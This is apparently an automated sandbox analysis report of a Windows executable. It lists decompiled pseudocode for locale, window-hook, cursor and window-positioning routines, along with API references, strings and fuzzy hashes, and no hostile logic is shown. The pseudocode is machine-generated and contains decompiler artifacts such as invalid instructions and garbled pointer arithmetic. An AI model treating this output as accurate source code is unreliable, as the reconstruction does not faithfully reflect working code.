GetThreadLocale.KERNEL32(?,00000000,0040BC77,?,?,00000000), ref: 0040BBF8 Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972 GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040BC77,?,?,00000000), ref: 0040BC28 EnumCalendarInfoA.KERNEL32(Function_0000BB2C,00000000,00000000,00000004), ref: 0040BC33 GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040BC77,?,?,00000000), ref: 0040BC51 EnumCalendarInfoA.KERNEL32(Function_0000BB68,00000000,00000000,00000003), ref: 0040BC5C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum String ID: API String ID: 4102113445-0 Opcode ID: 97d354d8b6cdc2396397ecc49eed239671b501c3797063cbf2a75c35dab51ed0 Instruction ID: 22d4ad3a48fad1cbf9e27e67077bea737ce6d0b3631ad7d1c133fb8823499fa8 Opcode Fuzzy Hash: 97d354d8b6cdc2396397ecc49eed239671b501c3797063cbf2a75c35dab51ed0 Instruction Fuzzy Hash: 7E012F717442446BE601B7758D03F2A366CDB86718F61403BB900FA6C9DB3CAE1086AC

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00455410() { void* _t2; void* _t5; void* _t8; struct HHOOK__* _t10; if( *0x466598 != 0) { _t10 = *0x466598; // 0x0 UnhookWindowsHookEx(_t10); } *0x466598 = 0; if( *0x46659c != 0) { _t2 = *0x466594; // 0x0 SetEvent(_t2); if(GetCurrentThreadId() != *0x466590) { _t8 = *0x46659c; // 0x0 WaitForSingleObject(_t8, 0xffffffff); } _t5 = *0x46659c; // 0x0 CloseHandle(_t5); *0x46659c = 0; return 0; } return 0; } 0x00455417 0x00455419 0x0045541f 0x0045541f 0x00455426 0x00455432 0x00455434 0x0045543a 0x0045544a 0x0045544e 0x00455454 0x00455454 0x00455459 0x0045545f 0x00455466 0x00000000 0x00455466 0x0045546b

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 0045541F SetEvent.KERNEL32(00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 0045543A GetCurrentThreadId.KERNEL32 ref: 0045543F WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 00455454 CloseHandle.KERNEL32(00000000,00000000,00457DAE,00000000,00456B7B,?,?,00460C02,00000001,00456D41,?,00000000,00000000,00000000,00000001), ref: 0045545F

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows String ID: API String ID: 2429646606-0 Opcode ID: 8d4b083acdc61fb605ee7809ee2f04c3fef8837cea9ec92acbb126d3f3c8ffb3 Instruction ID: c8276ee7c81c26c9bfae65dd25605525a1fe353da67a80127bb571263e38ba24 Opcode Fuzzy Hash: 8d4b083acdc61fb605ee7809ee2f04c3fef8837cea9ec92acbb126d3f3c8ffb3 Instruction Fuzzy Hash: 50F0F870510580BACA10EF69BC47B1532E4A70D316B124A3AF00AD71EBE7B9B484CF1E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%

E00458030(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) { char _v8; intOrPtr _v12; char _v16; intOrPtr _v20; struct HWND__* _v24; intOrPtr _v28; char _v32; struct tagRECT _v48; intOrPtr _v52; intOrPtr _v56; int _v60; int _v64; intOrPtr _v68; char _v72; int _v76; char _v80; intOrPtr _v84; intOrPtr _v88; struct tagPOINT _v96; char _v97; struct tagRECT _v113; char _v132; intOrPtr _v136; char _v140; char _v144; char _v148; struct HWND__* _t131; void* _t145; struct HWND__* _t167; intOrPtr _t188; char _t194; intOrPtr _t218; intOrPtr _t222; void* _t238; intOrPtr* _t250; intOrPtr _t269; intOrPtr _t271; intOrPtr _t276; struct tagRECT* _t298; intOrPtr* _t302; intOrPtr _t303; void* _t310; _t309 = _t310; _push(__ebx); _push(__esi); _push(__edi); _t251 = 0; _v144 = 0; _v148 = 0; asm("movsd"); asm("movsd"); _v8 = __eax; _t268 = *0x44c7e8; // 0x44c7ec E004051D8( &_v72, _t268); _t250 = &_v8; _push(_t310); _push(0x4583b7); _push( *[fs:eax]); *[fs:eax] = _t310 + 0xffffff70; *((char*)( *_t250 + 0x58)) = 0; _v24 = 0; if( *((char*)( *_t250 + 0x88)) == 0 || *((intOrPtr*)( *_t250 + 0x60)) == 0 || E0044CBE4() == 0) { L23: _t131 = _v24; __eflags = _t131; if(_t131 <= 0) { L00457D90( *_t250, _t251, _t268); } else { E00457B58( *_t250, 0, _t131); } goto L26; } else { _t145 = E00455288(E00438F94( &_v80, 1)); _t268 = *_t250; if(_t145 != *((intOrPtr*)( *_t250 + 0x60))) { goto L23; } else { _v72 = *((intOrPtr*)( *_t250 + 0x60)); _v64 = _v80; _v60 = _v76; _v60 = _v60 + E00457DC8(); _v56 = E00454604(); _v52 = *((intOrPtr*)( *_t250 + 0x5c)); E0043A33C( *((intOrPtr*)( *_t250 + 0x60)), &_v132); _t298 = &_v48; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))(); _v96.x = 0; _v96.y = 0; _t302 = *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30)); _t316 = _t302; if(_t302 == 0) { _t303 = *((intOrPtr*)( *_t250 + 0x60)); _t276 = *0x4369e8; // 0x436a34 _t167 = E00403AB4(_t303, _t276); __eflags = _t167; if(_t167 != 0) { __eflags = *(_t303 + 0x1c4); if( *(_t303 + 0x1c4) != 0) { ClientToScreen( *(_t303 + 0x1c4), &_v96); } } } else { *((intOrPtr*)( *_t302 + 0x40))(); } OffsetRect( &_v48, _v96.x - _v88, _v96.y - _v84); E0043A55C( *((intOrPtr*)( *_t250 + 0x60)), &_v140, &_v80); _v32 = _v140; _v28 = _v136; E00455250( *((intOrPtr*)( *_t250 + 0x60)), &_v148); E004376EC(_v148, &_v140, &_v144, _t316); E004047D4( &_v16, _v144); _v20 = *((intOrPtr*)( *_t250 + 0x74)); _t188 = *0x4626b8; // 0x436fb0 _v68 = _t188; _v12 = 0; _t251 = 0; _v97 = E0043BC9C( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030, &_v72) == 0; if(_v97 != 0 && *((short*)( *_t250 + 0x15a)) != 0) { _t251 = &_v97; *((intOrPtr*)( *_t250 + 0x158))( &_v72); } if(_v97 == 0 || *((intOrPtr*)( *_t250 + 0x60)) == 0) { _t194 = 0; } else { _t194 = 1; } _t268 = *_t250; *((char*)( *_t250 + 0x58)) = _t194; if( *((char*)( *_t250 + 0x58)) == 0) { goto L23; } else { _t323 = _v16; if(_v16 == 0) { goto L23; } L00457F20(_v68, _t268, _t309); *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x74))(); *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xe8))( &_v113, _v12); OffsetRect( &_v113, _v64, _v60); if(E00403B24( *((intOrPtr*)( *_t250 + 0x84)), _t323) != 0) { _t238 = L00457F80(_v16, _t250, _t298, 0xffc7, _t309) + 5; _v113.left = _v113.left - _t238; _v113.right = _v113.right - _t238; } E0043A4AC( *((intOrPtr*)( *_t250 + 0x60)), &_v140, &_v48); _t218 = *_t250; *((intOrPtr*)(_t218 + 0x64)) = _v140; *((intOrPtr*)(_t218 + 0x68)) = _v136; E0043A4AC( *((intOrPtr*)( *_t250 + 0x60)), &_v140, &(_v48.right)); _t222 = *_t250; *((intOrPtr*)(_t222 + 0x6c)) = _v140; *((intOrPtr*)(_t222 + 0x70)) = _v136; E0043AB90( *((intOrPtr*)( *_t250 + 0x84)), _v52); _t115 = *_t250 + 0x84; // 0xff7ce8c3 *((intOrPtr*)( *((intOrPtr*)( *_t115)) + 0xe4))(_v12); E0045539C(_v16); _t231 = _v24; if(_v24 <= 0) { E00457B58( *_t250, 1, _v20); } else { E00457B58( *_t250, 0, _t231); } L26: _pop(_t269); *[fs:eax] = _t269; _push(E004583BE); E00404760( &_v148, 2); _t271 = *0x44c7e8; // 0x44c7ec return E0040529C( &_v72, _t271); } } } } 0x00458031 0x00458039 0x0045803a 0x0045803b 0x0045803c 0x0045803e 0x00458044 0x0045804f 0x00458050 0x00458051 0x00458057 0x0045805d 0x00458062 0x00458067 0x00458068 0x0045806d 0x00458070 0x00458075 0x0045807b 0x00458087 0x00458370 0x00458370 0x00458373 0x00458375 0x00458386 0x00458377 0x0045837d 0x0045837d 0x00000000 0x004580a6 0x004580b0 0x004580b5 0x004580ba 0x00000000 0x004580c0 0x004580c5 0x004580cb 0x004580d1 0x004580d9 0x004580e6 0x004580ee 0x004580f9 0x00458101 0x00458104 0x00458105 0x00458106 0x00458107 0x00458112 0x00458117 0x0045811c 0x00458124 0x00458127 0x00458129 0x00458139 0x0045813e 0x00458144 0x00458149 0x0045814b 0x0045814d 0x00458154 0x00458161 0x00458161 0x00458154 0x0045812b 0x00458132 0x00458132 0x00458178 0x0045818b 0x00458196 0x0045819f 0x004581ad 0x004581be 0x004581cc 0x004581d6 0x004581d9 0x004581de 0x004581e3 0x004581ef 0x004581fd 0x00458205 0x00458217 0x00458225 0x00458225 0x0045822f 0x00458239 0x0045823d 0x0045823d 0x0045823d 0x0045823f 0x00458241 0x0045824a 0x00000000 0x00458250 0x00458250 0x00458254 0x00000000 0x00000000 0x0045825e 0x00458277 0x00458292 0x004582a4 0x004582bc 0x004582c8 0x004582cb 0x004582ce 0x004582ce 0x004582df 0x004582e4 0x004582ec 0x004582f5 0x00458306 0x0045830b 0x00458313 0x0045831c 0x0045832a 0x00458335 0x00458343 0x00458349 0x0045834e 0x00458353 0x00458369 0x00458355 0x0045835b 0x0045835b 0x0045838b 0x0045838d 0x00458390 0x00458393 0x004583a3 0x004583ab 0x004583b6 0x004583b6 0x0045824a 0x004580ba

APIs

Part of subcall function 0044CBE4: GetActiveWindow.USER32 ref: 0044CBE7 Part of subcall function 0044CBE4: GetCurrentThreadId.KERNEL32 ref: 0044CBFC Part of subcall function 0044CBE4: EnumThreadWindows.USER32(00000000,0044CBC4), ref: 0044CC02 Part of subcall function 00457DC8: GetCursor.USER32(?,?,?,?,?,?,?,?,?,?,?,004580D9,00000000,004583B7), ref: 00457DE3 Part of subcall function 00457DC8: GetIconInfo.USER32(00000000,?), ref: 00457DE9 ClientToScreen.USER32(?,?), ref: 00458161 OffsetRect.USER32(?,?,?), ref: 00458178 OffsetRect.USER32(?,?,?), ref: 004582A4 Part of subcall function 00457B58: SetTimer.USER32 ref: 00457B72

Strings

4jC , xrefs: 0045813E

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows String ID: 4jC API String ID: 2591747986-2900625241 Opcode ID: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029 Instruction ID: 3c06f24524cbe1945d16a03846c9b40712580fa28ccc941ba7e8c22a91bf12dc Opcode Fuzzy Hash: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029 Instruction Fuzzy Hash: 27C1E435A00618CFCB10DFA9C494A9EB7F5BF49304F1081AAE905EB366DB34AD4ACF45

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E0043B7E4(void* __eax, intOrPtr __ecx, intOrPtr __edx, signed char _a4) { intOrPtr _v8; signed char _v9; intOrPtr _v16; struct tagPOINT _v32; intOrPtr _v36; long _v40; char _v56; void* __edi; struct HWND__* _t57; void* _t63; signed char _t84; struct HWND__* _t108; void* _t110; intOrPtr _t134; intOrPtr _t137; void* _t141; struct HWND__* _t143; struct HWND__* _t147; void* _t152; void* _t154; intOrPtr _t155; _t152 = _t154; _t155 = _t154 + 0xffffffcc; _v8 = __ecx; _t137 = __edx; _t110 = __eax; if(__edx == 0 || __edx == 0xffffffff) { _t57 = *(_t110 + 0x94); if(_t57 == 0 || *((char*)(_t57 + 0x1db)) == 0 || *((intOrPtr*)(_t57 + 0x1b0)) == 0) { E0041938C( *((intOrPtr*)(_t110 + 0x40)), &_v40, *((intOrPtr*)(_t110 + 0x44))); _v32.x = _v40; _v32.y = _v36; _t143 = *(_t110 + 0x30); __eflags = _t143; if(_t143 != 0) { E0043A4AC(_t143, &_v40, &_v32); _v32.x = _v40; _v32.y = _v36; } } else { *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x1b0)))) + 0x14))(); MapWindowPoints(E004423F8( *(_t110 + 0x94)), 0, &_v32, "true"); } _t63 = E0043A9A8(_t110); E004193DC(_v32.x, E0043A9BC(_t110), _v32.y, &_v56, _t63); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _v9 = E0043B9C4(_t110, &_v32); goto L20; } else { E0043BCD0(__eax); __eflags = *(_t110 + 0x94); if(__eflags == 0) { L12: _t84 = 1; } else { _t108 = E00403B24( *(_t110 + 0x94), __eflags); __eflags = _t108; if(_t108 != 0) { goto L12; } else { _t84 = 0; } } _v9 = _t84; __eflags = _v9; if(_v9 == 0) { L20: return _v9 & 0x000000ff; } else { _v16 = L00437D90(1, _t137); _push(_t152); _push(0x43b9b0); _push( *[fs:edx]); *[fs:edx] = _t155; _t87 = *(_t110 + 0x94); __eflags = *(_t110 + 0x94); if( *(_t110 + 0x94) == 0) { _t147 = 0; __eflags = 0; } else { _t147 = E004423F8(_t87); } E0043A33C(_t110, &_v32); __eflags = _t147; if(__eflags != 0) { MapWindowPoints(_t147, 0, &_v32, "true"); } *((intOrPtr*)(_v16 + 8)) = _t137; *((char*)(_v16 + 0x5c)) = _a4 & 0x000000ff; *((intOrPtr*)(_v16 + 0x60)) = _v8; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t141 = _t137; MapWindowPoints(0, E004423F8(_t141), &_v32, 1); _push(_v32.y); E00403B24(_t141, __eflags); __eflags = 0; _pop(_t134); *[fs:eax] = _t134; _push(0x43b9b7); return E00403928(_v16); } } } 0x0043b7e5 0x0043b7e7 0x0043b7ed 0x0043b7f0 0x0043b7f2 0x0043b7f6 0x0043b801 0x0043b809 0x0043b851 0x0043b859 0x0043b85f 0x0043b862 0x0043b865 0x0043b867 0x0043b871 0x0043b879 0x0043b87f 0x0043b87f 0x0043b81d 0x0043b82a 0x0043b841 0x0043b841 0x0043b884 0x0043b89d 0x0043b8a8 0x0043b8a9 0x0043b8aa 0x0043b8ab 0x0043b8b6 0x00000000 0x0043b8be 0x0043b8c0 0x0043b8c5 0x0043b8cc 0x0043b8e9 0x0043b8e9 0x0043b8ce 0x0043b8dc 0x0043b8e1 0x0043b8e3 0x00000000 0x0043b8e5 0x0043b8e5 0x0043b8e5 0x0043b8e3 0x0043b8eb 0x0043b8ee 0x0043b8f2 0x0043b9b7 0x0043b9c1 0x0043b8f8 0x0043b906 0x0043b90b 0x0043b90c 0x0043b911 0x0043b914 0x0043b917 0x0043b91d 0x0043b91f 0x0043b92a 0x0043b92a 0x0043b921 0x0043b926 0x0043b926 0x0043b931 0x0043b936 0x0043b938 0x0043b943 0x0043b943 0x0043b94b 0x0043b955 0x0043b95e 0x0043b96b 0x0043b96c 0x0043b96d 0x0043b96e 0x0043b96f 0x0043b980 0x0043b988 0x0043b995 0x0043b99a 0x0043b99c 0x0043b99f 0x0043b9a2 0x0043b9af 0x0043b9af 0x0043b8f2

APIs

MapWindowPoints.USER32 ref: 0043B841 MapWindowPoints.USER32 ref: 0043B943 MapWindowPoints.USER32 ref: 0043B980

Strings

QC , xrefs: 0043B8FC

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: PointsWindow String ID: QC API String ID: 4123100037-2823088291 Opcode ID: c87c83c8ec2422dba84d10b9213b873d1e9cb87eb2f57974cc0814849e7b209b Instruction ID: 0050ec7504fc6389c387471725f03a9a37d0cdeba202718832385931f1dd160c Opcode Fuzzy Hash: c87c83c8ec2422dba84d10b9213b873d1e9cb87eb2f57974cc0814849e7b209b Instruction Fuzzy Hash: A5517071E002099BCB10DF69C881BEEB7F9EF49304F15506AEE14AB382C7789D05CBA5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E0040BC90(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr _v8; char _v12; void* _v16; char _v20; char _v24; intOrPtr _t50; intOrPtr _t52; intOrPtr _t54; intOrPtr _t56; intOrPtr _t80; void* _t81; intOrPtr _t82; intOrPtr _t88; intOrPtr _t96; intOrPtr _t115; signed int _t123; signed int _t125; void* _t127; intOrPtr _t130; void* _t131; _t131 = __eflags; _push(0); _push(0); _push(0); _push(0); _push(0); _t125 = __edx; _t127 = __eax; _push(_t130); _push(0x40be60); _push( *[fs:eax]); *[fs:eax] = _t130; _t96 = 1; E0040473C(__edx); E0040B954(GetThreadLocale(), 0x40be78, 0x1009, &_v12); if(E00408B44(0x40be78, 1, _t131) + 0xfffffffd - 3 < 0) { while(1) { __eflags = _t96 - E004049FC(_t127); if(__eflags > 0) { goto L29; } asm("bt [0x461808], eax"); if(__eflags >= 0) { _t50 = E00409184(_t127 + _t96 - 1, 2, 0x40be7c); __eflags = _t50; if(_t50 != 0) { _t52 = E00409184(_t127 + _t96 - 1, 4, 0x40be8c); __eflags = _t52; if(_t52 != 0) { _t54 = E00409184(_t127 + _t96 - 1, 2, 0x40bea4); __eflags = _t54; if(_t54 != 0) { _t56 = ( *(_t127 + _t96 - 1) & 0x000000ff) - 0x59; __eflags = _t56; if(_t56 == 0) { L25: E00404A08(_t125, 0x40bebc); } else { __eflags = _t56 != 0x20; if(_t56 != 0x20) { E00404924(); E00404A08(_t125, _v24); } else { goto L25; } } } else { E00404A08(_t125, 0x40beb0); _t96 = _t96 + 1; } } else { E00404A08(_t125, 0x40be9c); _t96 = _t96 + 3; } } else { E00404A08(_t125, 0x40be88); _t96 = _t96 + 1; } _t96 = _t96 + 1; __eflags = _t96; } else { _v8 = E0040CD80(_t127, _t96); E00404C60(_t127, _v8, _t96, &_v20); E00404A08(_t125, _v20); _t96 = _t96 + _v8; } } } else { _t80 = *0x4658cc; // 0x9 _t81 = _t80 - 4; if(_t81 == 0 || _t81 + 0xfffffff3 - 2 < 0) { _t82 = 1; } else { _t82 = 0; } if(_t82 == 0) { E00404790(_t125, _t127); } else { while(_t96 <= E004049FC(_t127)) { _t88 = ( *(_t127 + _t96 - 1) & 0x000000ff) - 0x47; __eflags = _t88; if(_t88 != 0) { __eflags = _t88 != 0x20; if(_t88 != 0x20) { _t123 = *(_t127 + _t96 - 1) & 0x000000ff; _push(ds); asm("invalid"); _t8 = _t125 + _t125 * 8 - 0xbaa7401; *_t8 = *((intOrPtr*)(_t125 + _t125 * 8 - 0xbaa7401)) + 0x40be78; __eflags = *_t8; E00404A08(_t125, _t123); } } _t96 = _t96 + 1; __eflags = _t96; } } } L29: _pop(_t115); *[fs:eax] = _t115; _push(0x40be67); return E00404760( &_v24, 4); } 0x0040bc90 0x0040bc95 0x0040bc96 0x0040bc97 0x0040bc98 0x0040bc99 0x0040bc9d 0x0040bc9f 0x0040bca3 0x0040bca4 0x0040bca9 0x0040bcac 0x0040bcaf 0x0040bcb6 0x0040bcce 0x0040bce6 0x0040be36 0x0040be3d 0x0040be3f 0x00000000 0x00000000 0x0040bd55 0x0040bd5c 0x0040bd9a 0x0040bd9f 0x0040bda1 0x0040bdc3 0x0040bdc8 0x0040bdca 0x0040bdeb 0x0040bdf0 0x0040bdf2 0x0040be08 0x0040be08 0x0040be0a 0x0040be10 0x0040be17 0x0040be0c 0x0040be0c 0x0040be0e 0x0040be26 0x0040be30 0x00000000 0x00000000 0x00000000 0x0040be0e 0x0040bdf4 0x0040bdfb 0x0040be00 0x0040be00 0x0040bdcc 0x0040bdd3 0x0040bdd8 0x0040bdd8 0x0040bda3 0x0040bdaa 0x0040bdaf 0x0040bdaf 0x0040be35 0x0040be35 0x0040bd5e 0x0040bd67 0x0040bd75 0x0040bd7f 0x0040bd84 0x0040bd84 0x0040bd5c 0x0040bcec 0x0040bcec 0x0040bcf1 0x0040bcf4 0x0040bd02 0x0040bcfe 0x0040bcfe 0x0040bcfe 0x0040bd06 0x0040bd43 0x0040bd08 0x0040bd2f 0x0040bd0f 0x0040bd0f 0x0040bd11 0x0040bd13 0x0040bd15 0x0040bd1a 0x0040bd1d 0x0040bd1e 0x0040bd20 0x0040bd20 0x0040bd20 0x0040bd29 0x0040bd29 0x0040bd15 0x0040bd2e 0x0040bd2e 0x0040bd2e 0x0040bd3a 0x0040bd06 0x0040be45 0x0040be47 0x0040be4a 0x0040be4d 0x0040be5f

APIs

GetThreadLocale.KERNEL32(?,00000000,0040BE60,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040BCBF Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972

Strings

eeee , xrefs: 0040BDCE ggg , xrefs: 0040BDA5 yyyy , xrefs: 0040BDB5

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread String ID: eeee$ggg$yyyy API String ID: 4232894706-1253427255 Opcode ID: 22af1f82e12c2a638afe9ae91d7be04f620c0193c2544057d1f3039dc33699de Instruction ID: e06779fda62c0aa1c2fe6e63d9f97ef423efd52b2f0bde73b2610bed017219b3 Opcode Fuzzy Hash: 22af1f82e12c2a638afe9ae91d7be04f620c0193c2544057d1f3039dc33699de Instruction Fuzzy Hash: 0341D2B03041454BC711AA7AC8866BFF2E6DF95304B64443BAA51B73C6DB3CAD0296ED

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%

E004389EC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) { intOrPtr _v8; intOrPtr _v12; struct tagPOINT _v20; intOrPtr _v24; char _v28; char _v36; void* __edi; void* __ebp; intOrPtr _t54; intOrPtr _t60; intOrPtr _t65; intOrPtr _t71; intOrPtr _t74; void* _t88; intOrPtr _t105; intOrPtr _t115; intOrPtr _t116; intOrPtr _t120; intOrPtr _t123; intOrPtr _t124; intOrPtr _t129; void* _t133; intOrPtr _t134; void* _t137; _t137 = __fp0; _v8 = __ecx; _t88 = __edx; _t124 = __eax; *0x466510 = __eax; _push(_t133); _push(0x438b91); _push( *[fs:edx]); *[fs:edx] = _t134; _v12 = 0; *0x466518 = 0; _t135 = *((char*)(__eax + 0x8f)); if( *((char*)(__eax + 0x8f)) != 0) { E00403B24(__eax, __eflags); __eflags = *0x466510; if( *0x466510 != 0) { __eflags = _v12; if(_v12 == 0) { _v12 = L00437D90(1, _t124); *0x466518 = 1; } _t128 = *((intOrPtr*)(_v12 + 0x40)); _t105 = *0x4369e8; // 0x436a34 _t54 = E00403AB4( *((intOrPtr*)(_v12 + 0x40)), _t105); __eflags = _t54; if(_t54 == 0) { _t129 = *((intOrPtr*)(_v12 + 0x40)); __eflags = *((intOrPtr*)(_t129 + 0x30)); if( *((intOrPtr*)(_t129 + 0x30)) != 0) { L14: __eflags = 0; E0041938C(0, &_v36, 0); E0043A4AC(_t129, &_v28, &_v36); _t60 = _v12; *((intOrPtr*)(_t60 + 0x4c)) = _v28; *((intOrPtr*)(_t60 + 0x50)) = _v24; L15: __eflags = *(_v12 + 0x4c) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x48)); E0041938C( *(_v12 + 0x4c) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x48)), &_v28, *((intOrPtr*)(_v12 + 0x50)) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x4c))); _t65 = _v12; *((intOrPtr*)(_t65 + 0x54)) = _v28; *((intOrPtr*)(_t65 + 0x58)) = _v24; goto L16; } _t116 = *0x4369e8; // 0x436a34 _t71 = E00403AB4(_t129, _t116); __eflags = _t71; if(_t71 != 0) { goto L14; } GetCursorPos( &_v20); _t74 = _v12; *(_t74 + 0x4c) = _v20.x; *((intOrPtr*)(_t74 + 0x50)) = _v20.y; goto L15; } else { GetWindowRect(E004423F8(_t128), _v12 + 0x4c); L16: asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); L17: E0043887C(_v12, _v8, _t88, _t133, _t137); _pop(_t115); *[fs:eax] = _t115; return 0; } } _pop(_t120); *[fs:eax] = _t120; return 0; } E00403B24(__eax, _t135); if( *0x466510 != 0) { __eflags = _v12; if(_v12 == 0) { _v12 = E00437C80(_t124, 1); *0x466518 = 1; } goto L17; } _pop(_t123); *[fs:eax] = _t123; return 0; } 0x004389ec 0x004389f5 0x004389f8 0x004389fa 0x004389fc 0x00438a04 0x00438a05 0x00438a0a 0x00438a0d 0x00438a12 0x00438a15 0x00438a1c 0x00438a23 0x00438a79 0x00438a7e 0x00438a85 0x00438a94 0x00438a98 0x00438aa8 0x00438aab 0x00438aab 0x00438ab5 0x00438aba 0x00438ac0 0x00438ac5 0x00438ac7 0x00438ae5 0x00438ae8 0x00438aec 0x00438b19 0x00438b1e 0x00438b20 0x00438b2d 0x00438b32 0x00438b38 0x00438b3e 0x00438b41 0x00438b53 0x00438b59 0x00438b5e 0x00438b64 0x00438b6a 0x00000000 0x00438b6a 0x00438af0 0x00438af6 0x00438afb 0x00438afd 0x00000000 0x00000000 0x00438b03 0x00438b08 0x00438b0e 0x00438b14 0x00000000 0x00438ac9 0x00438ad8 0x00438b6d 0x00438b76 0x00438b77 0x00438b78 0x00438b79 0x00438b7a 0x00438b82 0x00438b89 0x00438b8c 0x00000000 0x00438b8c 0x00438ac7 0x00438a89 0x00438a8c 0x00000000 0x00438a8c 0x00438a2e 0x00438a3a 0x00438a49 0x00438a4d 0x00438a61 0x00438a64 0x00438a64 0x00000000 0x00438a4d 0x00438a3e 0x00438a41 0x00000000

Strings

4jC , xrefs: 00438ABA, 00438AF0 XQC , xrefs: 00438A57

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: 4jC$XQC API String ID: 0-1995860932 Opcode ID: 40d017accbd6cdc67a0eb8db3641b7ff0a2e78bce7532e2636fa8d279195c8d0 Instruction ID: 261b67947a93c7365b213fc49c75792a3b9849106cec410a1886ea52049641a3 Opcode Fuzzy Hash: 40d017accbd6cdc67a0eb8db3641b7ff0a2e78bce7532e2636fa8d279195c8d0 Instruction Fuzzy Hash: E4518F70A047099FCB00DF59D841A9EFBB5FF88318F2190AAF800A7351D779A985CB89

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%

